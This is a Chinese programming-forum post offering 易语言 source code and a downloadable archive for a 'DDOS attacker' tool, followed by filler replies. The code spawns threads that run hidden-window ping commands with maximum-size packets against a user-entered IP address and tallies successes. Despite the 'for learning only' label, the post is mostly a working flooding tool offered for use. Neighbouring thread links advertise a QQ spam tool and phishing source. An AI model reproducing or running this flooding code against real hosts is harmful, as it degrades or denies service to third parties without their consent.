编程开发网

 找回密码
 注册(Register)

QQ登录

只需一步,快速开始

查看: 415|回复: 141

[易源码] IP攻击器如何实现?易源码教你实现 仅供学习

  [复制链接]
发表于 2019-12-12 22:25:02 | 显示全部楼层 |阅读模式
.版本 2

.如果真 (是否攻击 = 假)
    销毁线程 = 销毁线程 + 1
    _启动窗口.标题 = “开启线程” + 编辑框2.内容 + “ ” + “关闭线程” + 到文本 (销毁线程)
    .如果真 (销毁线程 = 到数值 (编辑框2.内容))
        _启动窗口.标题 = “DDOS攻击器”
        按钮开始攻击.禁止 = 假
        编辑框2.禁止 = 假
        调节器1.禁止 = 假
        销毁线程 = 0
    .如果真结束
    返回 ()
.如果真结束

.如果 (运行 (“ping ” + 编辑框IP.内容 + “-l 65500 -n 1 -f”, 真, #隐藏窗口))
    ' -l 65500 -n 1 -f    65500是数据包大小  可改为0-65500之间的数
    成功次数 = 成功次数 + 1
.否则
    失败次数 = 失败次数 + 1
.如果结束
.如果真 (是否攻击 = 真)
    _启动窗口.标题 = “成功” + 到文本 (成功次数) + “ ” + “失败” + 到文本 (失败次数)
.如果真结束
攻击线程 ()


IP攻击器.rar

45.34 KB, 下载次数: 3





上一篇:易语言写的腾讯QQ空间刷留言工具免费分享
下一篇:QQ钓鱼源码,非常简单实现提供源码学习防范
分享到:
发表于 2019-12-13 12:34:09 | 显示全部楼层
写得实在太好了,我唯一能做的就是默默顶贴!
回复

使用道具 举报

发表于 2019-12-20 18:30:30 | 显示全部楼层
青春不在了,青春痘还在!
回复

使用道具 举报

发表于 2019-12-25 17:21:19 | 显示全部楼层
楼主就是我的榜样哦
回复

使用道具 举报

发表于 2019-12-31 00:58:52 | 显示全部楼层
我只看看不说话。。。
回复

使用道具 举报

发表于 2020-1-2 15:00:40 | 显示全部楼层
态度决定一切,不错!
回复

使用道具 举报

发表于 2020-1-3 21:50:12 | 显示全部楼层
刚分手,心情不好!
回复

使用道具 举报

发表于 2020-1-5 08:22:13 | 显示全部楼层
有内涵!
回复

使用道具 举报

发表于 2020-1-11 22:14:47 | 显示全部楼层
楼上的说的很好!
回复

使用道具 举报

发表于 2020-1-12 20:45:41 | 显示全部楼层
在这个版块混了这么久了,第一次看见这么给你的帖子!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册(Register)

本版积分规则


НП互联网知识НП

微博

НП技术交流群НП

技术群

QQ手机版 禁言处罚 编程开发网 蜀ICP备19036706号-2 Discuz! X3.4 Powered by © 2001-2013 Comsenz Inc. 

快速回复 快速发帖 返回顶部 返回列表